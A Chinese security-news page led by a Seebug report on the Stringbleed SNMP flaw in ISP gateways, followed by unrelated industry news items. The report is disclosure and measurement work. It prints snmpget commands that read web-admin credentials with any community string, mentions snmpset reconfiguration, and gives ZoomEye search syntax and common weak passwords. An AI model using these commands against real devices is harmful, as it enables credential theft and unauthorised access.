SNMP协议[1],即简单网络管理协议(SNMP,Simple Network Management Protocol),默认端口为 161/UDP,目前一共有3个版本:V1,V2c,V3。V3是最新的版本,在安全的设计上有了很大改进,不过目前广泛应用的还是存在较多安全问题的V1和V2c版本。SNMP协议工作的原理简单点来说就是管理主机向被管理的主机或设备发送一个请求,这个请求包含一个community和一个oid。oid就是一个代号,代表管理主机这个请求想要的信息。被管理的主机收到这个请求后,看请求community是否和自己保存的一致,如果一致,则把相应信息返回给管理主机。如果不一致,就不会返回任何信息。所以community相当与一个认证的口令。V1和V2c版本的SNMP协议都是明文传输数据的,所以可以通过抓包嗅探等手段获取认证需要的community。

2018年12月25日,Seebug 平台收录了多个基于SNMP协议的敏感信息泄露漏洞[2]。在多种厂商提供的网关类设备中,可以使用任意 community非常容易地读取SNMP提供的明文形式的的Web管理系统的用户名和密码、Wi-Fi凭证等信息。也可以使用任意community通过SET协议指令发送配置更新或控制请求,攻击者可以注入恶意的配置,如在Cisco DPC3928SL通过注入SSID造成Web管理系统的XSS(CVE-2018-20379)。

该漏洞最早于 2017 年 4 月 4 日曝出,CVE编号为CVE-2017-5135,漏洞发现者将该漏洞称之为 Stringbleed[3]。2018年12月22日,时隔一年多,漏洞发现者进行全球探测后提供了一个很全的漏洞影响列表,其中包含23个不同厂商78个不同型号的网关设备,同时申请了多个CVE编号(CVE-2018-20380~CVE-2018-20401)。关于漏洞的成因一直都在争论之中,截止目前依然没有最终定论[4]。该类设备一般由ISP提供,我们暂时没有找到漏洞设备或固件对漏洞原理进行研究。根据社区的讨论结果,产生该漏洞的原因可能有以下几种情况:

  • 这些存在漏洞的设备使用了同一个存在逻辑缺陷的SNMP协议实现,该实现代码没有正确处理 community 字符串认证,导致任意 community 均可以通过认证,进一步导致敏感信息泄露。
  • ISP 配置错误,无效的访问控制规则。

本文不包含漏洞分析,而是针对全球该类设备漏洞存在情况的数据分析报告。

3. 漏洞复现

直接使用 snmpget 命令发送 SNMP GET 请求即可, -c 选项指定任意字符串作为 community 均可通过认证。

snmpget -v 1 -c public $IP iso.3.6.1.2.1.1.1.0
snmpget -v 1 -c '#Stringbleed' $IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
snmpget -v 1 -c '#Stringbleed' $IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0

复现结果如下:

img

如果目标设备开放了Web服务,则可使用泄露的用户名和密码登陆Web管理系统,如下:

img

值得一提的是,用户名和密码存在为空的情况。

img

发送 SNMP SET 请求进行配置更新,-c 选项指定任意 community。如下所示,我们通过snmpset修改了 Web 系统用户名。

img

4. 漏洞影响范围

我们通过提取漏洞设备相关的“关键词”,在ZoomEye网络空间搜索引擎[5]上共发现了1,241,510个 IP数据。

img

通过使用 zmap 对这 124 万的IP数据进行存活检测,发现约有 23 万的IP 存活。进一步对存活的 23 万IP进行漏洞存在检验,发现有15882 个目标设备存在该敏感信息泄露漏洞,涉及23个厂商的多个型号设备的多个固件版本。

对这 15882 个漏洞设备的信息进行聚合,得到厂商及版本等统计信息如下(各个型号的ZoomEye dork 为: Vendor +Model +相应型号,如搜索DPC3928SL的语法为:Vendor +Model +DPC3928SL)

漏洞设备的厂商分布饼图如下(有一点需要说明的是,DPC3928SL网关设备属于受此漏洞影响最严重的网络设备之一,原来属于Cisco公司, 现在属于Technicolor。)

img

国家分布前十如下,主要分布在中国、泰国、韩国等国家。

img

中国存在漏洞的设备全部分布在广东、台湾两个省份,呈现一定的地域性。其中广东最多,为6318 台。

img

进一步分析发现,在原全球124万161/udp 端口的该类设备IP数据中,属于中国的几乎全部分布在广东省和台湾省,其他省份基本上没有探测到公网上该类设备端口开放(运营商禁用了SNMP服务或者没有使用同类设备?)。

img

广东省受影响的设备的ISP分布如下,98% 以上归属于 “珠江宽频/联通“ 这个ISP,存在漏洞的设备大部分为Technicolor CWA0101 Wireless Gateway ,version :gz5.0.2。

img

台湾的181台漏洞设备都归属于ISP:twmbroadband.com,存在漏洞的设备大部分为Ambit T60C926。结合以上数据分析,我们断定中国存在该漏洞设备的地理分布和当地的ISP有很大关系。

针对所有存在该漏洞的设备,我们统计了凭证的使用情况,如下:

常用用户名,主要包含admin、login、user、dlink等。

img

常用密码,主要包含 admin、password、dream01、空、br0adband、gzcatvnet、user、Broadcom、dlink、ambit、root等,大部分为常见的弱密码。

img

非常有意思的是,我们发现以下使用次数最多的用户名密码组合,和使用该凭证组合最多的漏洞设备,以及漏洞设备所在的国家,都存在一定的关联性。

(如第一行记录:中国所有含有该漏洞的设备中约有 5502 台都使用了 admin:admin 凭证,且受影响设备型号数量最多的为 Technicolor/CWA0101。)

5. 总结

基本可以肯定的是,这不是SNMP协议本身的问题,而是协议的实现代码存在漏洞或者ISP配置错误。该漏洞影响厂商、设备型号非常多,且呈现出一定的区域性。

路由器、Modem、摄像头等IoT设备的信息泄露漏洞层出不穷,对个人隐私造成极大的威胁,关闭非必要的端口或者使用防火墙限制非法访问是个值得考虑的举措。

系统的安全性往往取决于最短的那块木板-“木桶效应”,通过SNMP协议泄露HTTP服务凭证很好的说明了这一点。

用户可根据PoC自行验证设备是否存在漏洞,如果存在漏洞可联系相应的ISP寻求解决方案。

6. 相关链接

[1] SNMP 协议
https://baike.baidu.com/item/SNMP/133378?fr=aladdin

[2] Seebug 漏洞收录
https://www.seebug.org/vuldb/ssvid-97741
https://www.seebug.org/vuldb/ssvid-97742
https://www.seebug.org/vuldb/ssvid-97736

[3] Stringbleed
https://stringbleed.github.io/#

[4] 关于该漏洞的讨论
https://www.reddit.com/r/netsec/comments/67qt6u/cve_20175135_snmp_authentication_bypass/

[5] ZoomEye网络空间搜索引擎
https://www.zoomeye.org/searchResult?q=MODEL%20%2BVENDOR%20%2Bport%3A%22161%22

[6] SNMP 历史漏洞参考
http://drops.the404.me/1033.html


Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/795/

News stories from Thursday 17 January, 2019

Favicon for 知道创宇 15:54 知道创宇404实验室2018年网络空间安全报告 » Post from 知道创宇 Visit off-site link

作者:知道创宇404实验室

2018年是网络空间基础建设持续推进的一年,也是网络空间对抗激烈化的一年。IPV6的规模部署,让网络空间几何倍的扩大,带来的将会是攻击目标和攻击形态的转变。更多0day漏洞倾向于在曝光前和1day阶段实现价值最大化,也对防御方有了更高的要求。一手抓建设,一手抓防御,让2018年挑战与机遇并存。

2018年知道创宇404实验室(以下简称404实验室)一共应急了135次,Seebug漏洞平台收录了664个漏洞,相比于2017年,应急的漏洞数量更多、涉及的设备范围更广。

2018年上半年虚拟货币价值高涨所带来的是安全事件频发。区块链产业安全建设无法跟上虚拟货币的价值提升必然会导致安全事件的出现。由于区块链相关的攻击隐蔽且致命,监测、防御、止损等,都成为了区块链安全所需要面临的问题。“昊天塔(HaoTian)”是知道创宇404区块链安全研究团队独立开发的用于监控、扫描、分析、审计区块链智能合约安全自动化平台。《知道创宇以太坊合约审计CheckList》涵盖了超过29种会在以太坊审计过程中会遇到的问题,其中部分问题更是会影响到74.48%已公开源码的合约。

2018年网络空间攻击正呈现出0day/1day漏洞的快速利用化、历史漏洞定期利用化的特点。勒索病毒和挖矿产业在2018年大行其道,僵尸网络在未来的网络空间对抗中也有可能被赋予新的使命。虚拟货币价值高涨让部分存在漏洞的高性能服务器成为挖矿产业的目标,IoT漏洞的不断涌现也让历史僵尸网络不断补充弹药库。

2018年是数据泄漏事件频发曝光的一年。随着暗网用户的增多,黑市及虚拟货币的发展,暗网威胁必定会持续增长。知道创宇404安全研究团队也会持续通过技术手段来测绘暗网,提供威胁情报,追踪和对抗来自暗网的威胁。

完整报告请参阅:《[知道创宇404实验室]2018年网络空间安全报告》


Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/788/

News stories from Friday 18 August, 2017

Favicon for 云安全 17:38 腾讯云公布安全AI布局,聚焦AI及大数据构建智慧安全 » Post from 云安全 Visit off-site link

 816日,第三届中国互联网安全领袖峰会(CSS2017)大数据及云安全专场在北京召开,会议以“智慧安全 护航云端”为主题,聚焦如何用AI及大数据构建智慧安全。

会上,腾讯云正式公开了在云安全领域的AI战略布局,包含AI安全能力矩阵与产品矩阵,将腾讯云AI能力在安全场景下对外开放。腾讯云还发布了全流程数据安全保护方案——数盾,并联合多家企业共同成立DDoS防护联盟,联手对抗DDoS威胁。此外,来自中国信息安全认证中心、IDC、顺丰、微众银行、快牛金科、派网软件、天特信科技等企业机构的多名资深安全专家也在现场做了专题分享。

AI能力应用到安全领域,腾讯云展示安全AI布局

腾讯云副总裁、腾讯社交网络与腾讯云安全负责人黎巍强调:“在黑客将AI能力作为攻击利器之前,安全需要以AI打造出坚盾。” 他指出,基于海量安全数据,腾讯对AI安全的探索已经走过很长的一段历程,而目前,腾讯海量业务积累下来的AI安全能力,正通过腾讯云全面对外开放。

腾讯云发布的AI安全能力矩阵图,以大数据、机器学习、图计算、知识库等当前热门AI技术为核心,驱动社交图谱分析、图像自动识别、知识表达推理、自然语言处理4大能力组合,形成智能身份鉴定、威胁情报分析、异常流量检测、网络攻击溯源、人机行为识别、恶意图片识别、垃圾文本检测等7项技术应用。

腾讯云将上述AI安全能力与不同场景结合,便诞生了对应的AI安全产品矩阵。目前,腾讯云上应用到AI能力的安全产品已经涵盖业务安全(天御)、主机安全(云镜)、数据安全(数盾)、移动安全(乐固)、账号安全(祝融)、网站与流量安全、内容安全、风控安全等8项安全解决方案,实现由技术能力到场景应用的闭环贯通。

AI安全产品背后,拥有由大数据驱动的AI安全引擎

机器学习是重要的AI能力,腾讯云专家工程师成杰峰博士在会上指出了机器学习在安全领域应用的两大阻碍:一是样本问题,不存在天然的恶意攻击样本,且攻击的不断变种使得样本本身也具有时效性;二是精度问题,误杀或漏判都会产生较高代价,所以对算法的门槛很高,精度通常在99%以上。

针对这些难点,腾讯云已经打造出成熟的AI安全引擎:基于大规模图挖掘去不断地分析提取不良帐号、恶意IP和黑产设备,进而收集各类恶意和攻击,最终形成AI模型的样本。结合深度学习、自然语言处理和计算机视觉等AI能力,能够提供高精度预测模型和抽取黑产实体及特征的利器。

以腾讯云业务安全产品天御为例,基于AI安全引擎,正每天为东鹏特饮提供超过200万次风险判定请求,有效阻挡产业化的羊毛党刷走营销资源,实现更加安全有效的互联网营销,每年可以节约三千多万元。

开放腾讯数据安全积累,发布全流程数据安全保护方案——数盾

有报告显示,2016年相比较2014年全球大规模数据泄漏事件增长103%,平均每5小时就有一起数据泄漏事件发生,全球泄漏数据量近50亿条,曾经发生过数据泄露的企业竟多达80%

腾讯云专家工程师崔子翊指出:“随着数据规模的增加,单点布防的传统数据安全已经不能满足大数据时代的安全发展需求。”为此,腾讯云在会上正式发布了全流程数据安全保护方案——数盾。

腾讯云数盾是一款汇集了腾讯十余年数据保护经验,经历数百腾讯业务的数据保护实践,由数千人团队资源投入打造的数据安全方案。不仅是业界首例搭配同态加密的数据安全产品,还提供QQ同款的数据加密方案,能够将单条密码的暴力破解时间从数周延长到数千年。

数盾不仅能针对数据生命周期内的创建、存储、传输、访问、使用和销毁等每个阶段,应用不同安全防护。还能通过密码加密、大数据动态加密、身份管理、认证管理、授权管理、实时防护、审计预警等功能的实现,配合腾讯云全流程安全生态环境,提供系统化的安全防护。此外,数盾还独创6把钥匙端端验证机制,拥有提供PB级大数据处理能力、千亿级访问请求审计能力,并全套配备了API和模块组件,使得丰富的保护能力和架构能简快速接入,经过简单配置即可投入使用。

腾讯云联手多家企业成立DDoS防护联盟

本次大会也重点讨论到了日益严峻的DDoS形势,腾讯云安全技术总监方勇指出:“针对企业的DDoS攻击逐渐显露出高度组织化、超大流量等趋势。”为应对威胁,腾讯云早已推出大禹BGP高防,依靠大禹BGP高防先进特征识别算法进行精确清洗,以帮助企业抵御Syn FloodICMP Flood等各种大流量DDoS攻击。

DDoS 联盟发布现场

除了依托人工智能与大数据等前沿技术,生态合作也是腾讯云智慧安全的一贯思路。在大禹BGP高防的基础上,为了更好地助力行业应对DDoS威胁,本次大会腾讯云还宣布联合与会的辽宁途隆、唯一网络、睿伟网络、帝恩思共同成立DDoS防护联盟,未来将在DDoS大数据及态势感知、协同防护、黑产打击方面进行深度合作,联手对抗DDoS,共建安全的网络空间。

除上述重要发布外,多位行业安全大咖也在大会现场分享了他们对云安全的独到见解。中国信息安全认证中心张剑主任与大家探讨了大数据环境下的个人隐私保护;IDC项目副总裁Sean Pike分享了自己对全球云端安全的趋势预测;顺丰集团信息安全与内控处负责人刘新凯、微众银行基础科技产品部负责人卢道和、快牛金科CTO胡亮分享了各自领域的安全实践经验;派网软件CEO孙朝晖、天特信科技创始人高春辉都分享了重要的安全观点。

此次大会,腾讯云聚焦AI及大数据在云上安全的实践,全面展示安全AI的布局,相信将激发安全行业对AI应用的更多思考。至此,腾讯云“AI即服务”的战略与“智能云”概念在安全领域的布局已十分清晰,将基于大数据AI引擎,将核心AI能力与不同安全场景结合,打造更具智慧安全的云上环境。

News stories from Monday 28 November, 2016

Favicon for 云安全 22:07 幻云:给系统一个”幻影“ » Post from 云安全 Visit off-site link

 当前,网络安全形势严峻,网络安全事件时有发生,从年初的Gmail、雅虎和Hotmail 2.7亿账号遭泄露到MySpace出现史上最大规模数据泄露,再到令国人愤慨的准大学生徐玉玉遭电信诈骗后死亡,5.26侵犯公民个人信息案,这些令人震惊的安全事件表明数据正成为网络攻击者攻击的首要目标。

     然而,很多企业在遭受攻击后通常一无所知,直到这些敏感数据被公开之后才猛然醒悟,这其中的原因主要是由于大多数安全防御体系都是被动防御的,没有太多针对主机安全加固和数据安全防护的手段,攻击者一旦通过某种新型技术绕过企业现有的防御手段,企业则往往会陷入“谁进来了不知道、是敌是友不知道、干了什么不知道”的无所适从的被动局面,因此,数据窃取事件时有发生也就不难理解了。

       那么,有没有一种好的方法可以有效防止网络攻击者入侵,避免数据遭窃取呢?可能很多人会想到DLP或者数据加密方案,不过,有一批安全人却另辟蹊径,想出了另一个绝妙的方法来有效防止网络入侵,避免数据窃取。

分身术助用户防入侵

       看过火影忍者的朋友们一定知道漩涡鸣人有一种忍术叫做多重影分身术,当这种忍术发动的时候,就会产生很多漩涡鸣人的幻影,引诱敌人向幻影攻击,从而制造攻击敌人的机会。同样的,如果给可能会遭受攻击的系统同样也造一个“幻影“,并引诱网络入侵者攻击这个”幻影“,那么,岂不是可以有效避免网络入侵,避免真正的数据丢失?

       锦行科技的“幻云“就是这样一款安全产品。锦行科技产品总监胡鹏指出,幻云是一个“中心+端”模式,感应节点就好像是幻影,通过感应节点可以映射到诱骗环境。感应节点所映射出来的内容跟真的没什么区别,因此,在入侵者看来,感应节点就是一个真实的业务环境,就像幻影一样,攻击者根本分不清楚哪个是真哪个是假。在客户的业务网络中部署的感应节点越多,部署的范围越广,幻云就越能发挥更大的作用,攻击者中招几乎是必然的。

 多功能令企业慑黑客

锦行科技首席运营官董梁表示,幻云是一款基于欺骗诱导和信息的防御产品,幻云的目标是帮助企业在最低的成本下保证业务运行,保证企业核心资产不受侵害。幻云不是传统安全产品的替代而是补充,传统的防御产品具有一定的必要性和不可替代性,而幻云则是发挥最大的效能保护用户的数据财产。

 

    幻云为企业根据业务特性搭建了虚假的网络空间,并且根据入侵者的习性、思维模式和特征布下入侵者不得不踏入的“陷阱“,这是和被动的蜜罐防御技术的显著不同。一旦发现攻击者入侵之后,幻云就会立即向系统备份人、负责人进行短信、邮件、电话不同层级的报警,以便于企业能够及时感知自己所遭受的威胁,为下一步的应急工作制定相应的策略。

      幻云在把入侵者引进内网之后,能够依靠幻云内网在企业中发挥的主场优势,牢牢把攻击者控制在中间。幻云打造了一个类似于迷宫的内网环境,入侵者进来出不去,到不了真实环境,从而起到了拖延甚至消灭入侵者的作用,为企业的应急提供了时间。

幻云还能够让攻击者者切实感觉到自身是脆弱的,因为幻云在整个过程当中会尝试反转攻击者和防御者的角色,以往攻击者是找密码发现核心的东西,但是从现在开始,攻击者在进入内网之后,要时刻提防自己会遭受的攻击。幻云所搭建的环境,和企业的真实业务环境没有差别,攻击者在这里没有参照物可以去判别目前自己所处的环境到底是真实的网络环境还是处在幻云的陷阱里,更加不知道下一步是会踩在哪里。

更厉害的是,幻云通过记录入侵者的木马、工具、密码、攻击路径等信息,能够让网络入侵者的技术手段和真实身份曝光,不仅对入侵者产生威胁,也瓦解了入侵者再次攻击的念头。

    此外,幻云还能结合入侵者的行为序列和特征,分析出网络入侵者发起攻击的意图,或者盯上的核心资产的目标。从而可以帮助用户在关键节点上,或者关键的核心数据上做加固保护,做到有的放矢,虽然不能说是一劳永逸,但是起码也是未雨绸缪。

      幻云最后的一个核心功能,就是还原取证。幻云会完整地记录入侵者的每一步行为,事后可以以屏幕录像,代码回放等形式,百分之百展现入侵者从进入到离开的所有行为,从而为以后的调查取证提供详细的资料。

为企业信息安全保驾护航

       锦行科技首席安全官王俊卿总结道,由于网络攻防具有很强的不对称性,传统“拒敌于国门之外”的防御思路,难以了解入侵者的攻击意图,一旦入侵者采用先进技术绕过现有防御手段,企业无法实时感知,往往会陷入“谁进来了不知道、是敌是友不知道、干了什么不知道”的被动局面。要想解决这些问题,不仅要站在客户防御的角度,还应该切换到入侵者视角思考当前的威胁,这样才能全天候全方位感知网络空间态势,增强网络安全防御能力,而幻云就是锦行科技基于此理念研发的产品。

据悉,目前“幻云”已正式上线,同时还在不断地优化和迭代过程中。锦行科技将继续为国家关键基础设施安全保驾护航,保护企业核心信息数据,为推进信息安全行业发展贡献自己的力量。

News stories from Thursday 17 November, 2016

Favicon for 云安全 19:26 准能公司的下一代防火墙Stonesoft® 集成了云安全技术 » Post from 云安全 Visit off-site link

中国北京——2016年11月14日 —全球网络安全领导厂商准能科技公司(Forcepoint)于近日宣布:在成功地集成了云技术并且对其Stonesoft® 技术进行了持续升级后,其下一代防火墙(NGFW)Stonesoft NGFW 正式升级到6.1版本。该款获得了NSS实验室“推荐级”认证的Stonesoft® NGFW6.1防火墙将防护扩展到了云端,它能给用户带来更高的安全性、可升级扩展性以及更好的运行效率,它可以进行中心化部署和安全地部署,并管理遍布世界的网络设备。

Forcepoint公司网络安全副总裁Antti Reijonen说:“Stonesoft产品的性能能力要由创新的技术来支撑,这是我们准能公司网络总体安全观的一个关键要素;这次新发布的产品极大地提升了Stonesoft产品的安全有效性和运行效率、扩展了对基础设施升级的支持,同时,使防火墙易于部署,也降低了网络安全和运维人员的管理负担。”

Stonesoft NGFW 6.1运用了准能公司的威胁查询(ThreatSeeker)智能云技术,使它即使处在受到行动快速的零日漏洞威胁情况下,也能持续它的优化防护能力。无论是在传统网络中,还是在云端,用户都能更为高效地管理网络,保持其高可用性并且能对威胁、事故和时机的进行快速响应。

此外,现在,Stonesoft NGFW 6.1已支持虚拟防火墙,并且部署应用在了亚马逊云服务平台(AWS)上,它附在物理防火墙设备中,能进行中心化管理。

具备了这种新功能,规模不同的机构就能比较容易地管理整个校区、远程办公室和云端的防火墙。

Stonesoft 6.1可以支持客户在下一代防火墙使用准能公司的侧击安全模块(SSM)。这种针对UDP、TCP、HTTP和SSH的代理技术能为关键任务服务和应用提供更高水平的安全。只有下一代防火墙(NGFW)才支持这种技术,Stonesoft为选用了侧击安全模块(SSM)的客户提供升级通道,提供这种增强功能和独立的配置平台,让用户能更为高效地管理基于代理的安全策略。

通过采用中心化管理的安全策略和数据包深度检查技术,Stonesoft下一代防火墙成功通过了超过八亿次采用了高级闪避技术(AETs)的流氓流量攻击。最近,美国NSS实验室发布了《2016年下一代入侵防护系统比较测试报告》(NGIPS),该报告提到:在安全有效性方面,准能公司的 Stonesoft下一代防火墙 (NGFW)的拦截率是99.9%,该产品在总体安全有效性、性能以及总体拥有成本三个方面都获得了“推荐级”。报告中提到的产品亮点如下:

•准能公司的Stonesoft下一代防火墙(NGFW)能拦截100%的对服务器端应用的攻击、能拦截99.8%的对客户端应用的攻击,总体平均能拦截99.9%的攻击

•经验证,准能公司专有的高级闪避技术(AET)攻击防护技术对所有的攻击闪避技术(AET)都是有效的

•准能产品通过了所有的稳定性和可靠性试验

若想获得Stonesoft下一代防火墙(NGFW)的入侵防护、可升级扩展性和管理特点方面的更多资料,请访问:https://www.forcepoint.com/product/network-security/forcepoint-stonesoft-next-generation-firewall.

News stories from Monday 14 November, 2016

Favicon for 云安全 19:57 双十一背后的“暗战” » Post from 云安全 Visit off-site link

 在刚刚结束的双十一大战中,网络买家再次贡献出了超高的热情和惊人的购买力,52秒交易额超10亿,1小时达到353亿。在这个买家的大Party盛大召开,万众抢购的节日里,你是否会想到这背后,有多少黄牛、羊毛党、投机者、黑客在蠢蠢欲动、伺机而出,又有多少安全人员为此彻夜难眠,夜不成寐?双十一的到来,不仅仅是标志着网络购物节拉开帷幕,也标志着一场安全攻防暗战拉开了序幕。

双十一购物节,拥有庞大用户群、海量流量和现金流的电商平台,无疑会成为理想的攻击目标,其攻击手段主要分为以下几种:

黑账号:

即通过倒卖注册账号获利,京东风控研发总监吴鹍表示,账号是在所有电商平台里面非常重要的黑产资源,通过这些黑账号,可以通过贩卖高等级账号,虚假订单,互刷京豆、骗取运费险、多账号抢购限量低价产品等方式获利,而注册的黑账号的方法,也从个人手工注册、机器批量注册向团队化众包注册转变。

刷单:

即通过一些违法的方式,帮助自己或者相应商铺提高店铺信用和星级,以达到促进店铺销售的目的,蘑菇街电商风控架构师陈朝钢表示,目前,刷单已经从人工刷单、互相刷单,向刷单平台、团队刷单方向转变,其隐蔽性也越来越强。

欺诈:

即黑产通过各种各样的渠道拿到了部分或完整的订单信息,然后以各种各样的接口去欺骗买家进行退款,主要是通过链接引导买家到钓鱼网站,然后盗取买家相关信息。而这些订单的信息通常是通过打单软件或者人为泄露的。

薅羊毛:

即通过大批量抢购限量低价产品、套取优惠补贴等行为来赚取相关利益。腾讯云高级安全策略工程师刘飞飞表示,羊毛党每一次攻击主要分为三个阶段,第一个是准备阶段,即整合线下资源、挖掘IP资源、搜集活动资源,第二个是攻击阶段,第三个是套现阶段,而羊毛党的这些攻击也向着产业化,集团化的方向发展。

黄牛:

       即通过大量抢夺商家在优惠活动期间发送的优惠券,优惠卡和优惠商品并转卖的形式获取利益。目前,黄牛党的行动趋向于产业化、集团化、自动化。

        那么,针对这些攻击行为,电商们又有哪些应对手段呢?在腾讯举办的“双十一”背后的电商风控与安全媒体沙龙上,来自京东、蘑菇街、聚美优品和腾讯云的风控和安全专家分享了他们的心得。

 

       京东:三大策略阻黑产

京东风控研发总监吴鹍表示,数据关联、规则拦截、大数据分析是京东风控的三个主要策略。此外,通过登录、购物、客服、物流等的消费生命周期,综合性地对用户进行风险画像,也可以帮助京东识别出比较明显的黑产用户。而对隐藏得比较深的黑产,通过IP、地址、支付关系聚集等不同维度的指标,也可以较好的识别这类黑产用户。目前,京东大概有2000个不同指标的维度,可以用来帮助京东识别黑产用户。

   吴鹍表示,从京东的角度来看,风控未来的发展主要在以下四点:

     一、数据整合。其实很多平台都有非常多的数据,需要把这些数据里面隐藏的各种黑产特征抓出来,这需要的是数据整合的能力。

     二、提升黑产成本。在国家没有相关的严厉、严苛的法律法规出来遏制黑产之前,更多要做的是提升黑产的成本,让它无利可图,黑产自然就会消失。

     三、情报、潜伏。需要相关的部门做相关的情报收集工作和潜伏工作。

     四、联防联控。成立产业联盟,分享相关数据、营造联防联控的环境,共同打击黑产联盟。

蘑菇街:体系联盟拒黑产

蘑菇街电商风控架构师陈朝钢分享了蘑菇街在防御黑产方面的经验,陈朝钢表示,蘑菇街是一个社交型的电商,拥有多个UGC入口,需要更多技术手段进行有效的反垃圾处理,避免广告、钓鱼及其它违法内容对用户体验产生影响。除此以外,针对刷单、欺诈的安全防范同样得到了平台的高度重视。蘑菇街致力于通过体系对抗、风控智能化、平台服务化、联盟抱团等方法对安全能力进行着有效的提升。

而对于未来风控的趋势,陈朝钢表示,风控应对的方案应有以下几点:

一、体系化。风控不只是技术上面的应对,需要对技术、数据、运营包括各个产品线覆盖全,形成一个体系,不能有明显的漏洞。

二、智能化。传统的风控主要是基于规则的,但效果并不是特别理想,这就需要机器学习算法上的改进,并将算法和规则融合起来进行防控。

三、服务化。如果每条产品线去投入一个人,投入的人力会很大,所以需要走服务化的方向。通过提供多种服务、组件来帮助企业快速应对黑产攻击。

四、单个电商的积累总是有限的,所以要和其他电商包括和一些第三方,例如腾讯等厂商形成联盟进行对抗,共同应对业务安全的挑战

腾讯天御:联防联控抗黑产

腾讯云高级安全策略工程师刘飞飞表示,腾讯云把网络黑产分为三个主要类别,第一个是网络诈骗类别。第二类是破坏生态产业链的类别,这类是腾讯云风控关注的重点。 第三类是传统犯罪线上化。通过互联网隐藏自己的操作,使自己的风险等级降低,主要包括黄赌毒、枪支交易等等。腾讯云风控所关注的主要是第一类和第二类,而第三类已经有比较完善的打击手段。

刘飞飞介绍说,腾讯打击第一和第二类网络黑产主要是通过腾讯天御业务安全平台,该平台借助腾讯的平台优势,通过对外提供连接节点,进行联防联控,从而更好的达到与黑产整个产业链对抗的效果。该业务安全防护系统分为四层。顶层是数据层,然后是AI层,之后是产品层、业务层。防控思路是通过资源对抗,资源+技术的手段来压缩黑产的获利空间。通过整合公司内、外部数据以及网络上和黑产相关的数据以及一些运营商的数据资源,用大数据分析的方法与黑产及黑云进行对抗。天御系统可以为电商平台提供包括活动防刷、防恶意注册、防恶意登录、验证码、消息过滤、关键词检测、文件检测在内的七大能力,现阶段已经为聚美优品、京东商城、蘑菇街、滴滴出行等企业提供服务。

腾讯云:为电商保驾护航

腾讯云移动产品FT总监徐华龙表示,对抗黑产,如果仅仅依靠被动防御,是远远不够的,电商需要构筑自己强大稳定的电商平台才能在“双十一”期间更有效和及时的对抗黑产,并提升自身效率,提高运营水平。

徐华龙表示,腾讯云具有强大的基础云能力,拥有可弹性伸缩的IT资源,自动化的运维服务以及完备的容灾,是理想的电商平台,可以帮助电商在“双十一”期间从容应对高并发流量和高频度黑产安全事件。

此外,在支付环节,腾讯云通过微信支付加速,使得腾讯云的机房主机调用微信支付接口的延时最高缩短了20%,腾讯云机房访问微信支付接口延时比例与其他云服务厂商相比减少了30%,这对于对支付体验要求极为苛刻的电商在市场中取得竞争优势无疑是一个很大的帮助。在新业务环节,例如直播业务,腾讯云的视频解决方案能够提供全方位、立体化的技术支持,支持直播应用在24小时内完成快速对接,拥有完整的直播能力,实现稳定的用户体验,这将为更多电商平台尝试直播+电商模式提供更多可能性。在人工智能环节腾讯云还提供了智能的鉴黄服务,能够做到识别精度99.95%,从而可以替代95%的人力。在提升服务环节,腾讯云提供全面的智能语音的方案,通过智能语音来帮助用户寻求所有相关服务内容,从而使得客户日核查语音时长提升31倍,客户满意度提升23%。

写在最后

在笔者结稿时,“双十一”最终以1770.4亿元的惊人销售数字尘埃落定,但电商与黑产之间的较量却远远没有结束,京东、蘑菇街以及腾讯在此次电商风控与安全媒体沙龙上分享给我们的关于对抗黑产的经验和思考,值得所有电商从业人员借鉴。

News stories from Thursday 22 September, 2016

Favicon for 云安全 01:44 双十一将近,腾讯云安全推理剧还原电商攻防始末 » Post from 云安全 Visit off-site link

在这个信息爆炸的时代,每个技术人都有自己获取技术信息的方式和喜好。腾讯联合CSDN发起这次开发者媒体阅读习惯小调查,希望借此能了解广大技术人员的信息获取习惯,如关注哪些媒体,以及技术人员的阅读习惯。>>点击参与小调查


9月19日至25日,2016年国家网络安全宣传周在各省区市统一进行。希望通过政府主导,多方参与的形式,在全国范围内集中开展网络安全宣传教育活动。

在此期间,由腾讯安全联合实验室出品的系列安全推理剧《烧脑24小时之迷雾中的黑影》正式上线腾讯视频。该剧真实还原了电商网站遭云端攻击的情形,在提醒民众防范的同时,以案例形式对攻防手段进行了介绍。

目前,云技术的发展已初具规模,一方面给个人和企业带来极大便利,但也饱受不法分子的入侵,给个人和企业的信息、财产安全带来了巨大的威胁。今年的双十一即将到来,面对更加严峻的网络安全形势,借助平台力量做好安全保障将成为今年电商安全的主要思路。

(《烧脑24小时之迷雾中的黑影》剧照)

推理剧还原作案手段,揭秘云端对抗全程

《烧脑24小时之迷雾中的黑影》全方位还原了云端作案的手段。不法分子利用出租房流窜作案,锁定电商系统,通过扫描企业网络漏洞入侵系统,并用代理服务器的方式隐藏自身痕迹。盗取用户信息后,不法分子在不同地方消费,同时瘫痪电商平台,致使用户即使收到其银行消费提醒也无法及时登陆网站做出相应处理。

剧中,同样揭秘了腾讯云鼎实验室对抗云端攻击的全过程。腾讯云大禹DDoS防御系统对攻击流量进行拦截清洗,云鼎实验室挖掘分析黑客的入侵手法、使用的跳板机、登陆密码,在修复系统漏洞的同时,配合警方对不法分子进行锁定与抓捕,追回受害人资金。此外,云鼎实验室更帮助企业安装蜜罐系统,实现被入侵时快速感知和定位。

安全技术全面布局,腾讯云开放十数年安全积累

其实,类似的攻击案例层出不穷,网络安全形势越发严峻。腾讯云大禹数据显示,每月为用户防御DDoS攻击多达5万次,流量最高峰值达到400G。

面对产业化、制式化的黑色产业链,腾讯聚集了一批国内乃至国际上的顶尖安全专家,今年7月,正式成立中国首个互联网安全实验室矩阵——腾讯安全联合实验室,旗下涵盖科恩实验室、玄武实验室、湛泸实验室、云鼎实验室、反病毒实验室、反诈骗实验室、移动安全实验室七大专业实验室,专注于安全技术研究及安全攻防体系的搭建,安全防范和保障范围覆盖了连接、系统、应用、信息、设备、云六大互联网关键领域。

其中,云鼎实验室重点关注腾讯云安全体系建设,云主机与云内流量的安全研究和安全运营,以及云端app安全方案和虚拟化安全技术研究。

目前,腾讯云安全全面布局,提供从底层的数据安全、主机层的安全防御、网络层的攻击防御,以及客户端的安全防御在内的全系列产品和服务。通过平台开放,腾讯云更引入安全方面的合作伙伴,形成合力为企业用户提供服务。

